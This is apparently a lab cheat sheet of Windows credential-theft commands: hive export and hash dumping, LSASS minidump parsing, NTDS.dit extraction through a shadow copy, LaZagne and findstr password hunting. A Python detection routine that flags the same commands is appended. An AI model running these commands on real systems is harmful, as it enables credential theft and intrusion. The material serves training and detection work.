Windows Local Password Attacks
Attacking SAM
# Copy Registry Hives
# Admin Priv Needed
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save
# Copy To Local Machine
move sam.save \\<IP>\share
# Dump Hashes
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
# Dump SAM Remotely
crackmapexec smb <IP> --local-auth -u bob -p HTB_@cademy_stdnt! --sam
Attacking LSASS
Dumping LSASS
# Finding LSASS PID
tasklist /svc
Get-Process lsass
# Parse the LSASS minidump (.dmp) file
pypykatz lsa minidump lsass.dmp
Generating UserNames
https://github.com/urbanadventurer/username-anarchy
./username-anarchy -i <usernames.list>
Capturing NTDS.dit
Shadow Copy (Manual)
# Creating Shadow Copy
## Admin privs needed
vssadmin CREATE SHADOW /For=C:
# Copy NTDS from vss
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
CrackMapExec (Automatic & Faster)
crackmapexec smb <ip> -u <user> -p <pass> --ntds
Credential Hunting
Lazagne
Tool: https://github.com/AlessandroZ/LaZagne
# Start LaZagne
start lazagne.exe all
Find Command
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
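As an added example, not part of this cheat sheet, a small detection routine a defender could run over process-creation telemetry to flag the commands listed above (hive export, shadow copy creation, NTDS.dit copy from a shadow copy, LaZagne, recursive findstr for "password"). The event records are constructed samples in the shape of Sysmon Event ID 1 fields, and the rule names are assumptions of mine.

```python
import re

# Detection rules named after the techniques on this page (names are assumed, not standard).
# Each pattern is matched case-insensitively against the full process command line.
RULES = {
    "sam_hive_export": re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I),
    "shadow_copy_create": re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I),
    "ntds_copy_from_vss": re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\.dit", re.I),
    "lazagne_run": re.compile(r"\blazagne(\.exe)?\s+all\b", re.I),
    # /S = recurse subdirectories; the flag group may also carry /I and /M as on this page.
    "password_file_search": re.compile(r"\bfindstr(\.exe)?\b.*\s/s\w*\s.*password", re.I),
}


def classify(command_line: str):
    """Return the name of the first matching technique, or None if the line is benign."""
    for name, pattern in RULES.items():
        if pattern.search(command_line):
            return name
    return None


def detect(events):
    """Return (technique, user, command_line) for every suspicious process-create event."""
    hits = []
    for ev in events:
        name = classify(ev.get("CommandLine", ""))
        if name:
            hits.append((name, ev.get("User", "?"), ev["CommandLine"]))
    return hits


# Constructed sample events (not real telemetry), shaped like Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"User": "WS01\\bob", "CommandLine": "reg.exe save hklm\\sam C:\\sam.save"},
    {"User": "WS01\\bob", "CommandLine": "reg.exe save hklm\\system C:\\system.save"},
    {"User": "DC01\\admin", "CommandLine": "vssadmin CREATE SHADOW /For=C:"},
    {"User": "DC01\\admin", "CommandLine": "cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy2\\Windows\\NTDS\\NTDS.dit c:\\NTDS\\NTDS.dit"},
    {"User": "WS01\\alice", "CommandLine": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"User": "WS01\\bob", "CommandLine": "findstr /SIM /C:\"password\" *.txt *.ini *.config"},
    {"User": "WS01\\bob", "CommandLine": "lazagne.exe all"},
]

if __name__ == "__main__":
    for technique, user, cmd in detect(SAMPLE_EVENTS):
        print(f"[{technique}] {user}: {cmd}")
```

In a real deployment the same rules would be applied to the CommandLine field of Sysmon or Security 4688 events, and a hit on a non-admin workstation account is the signal worth triaging.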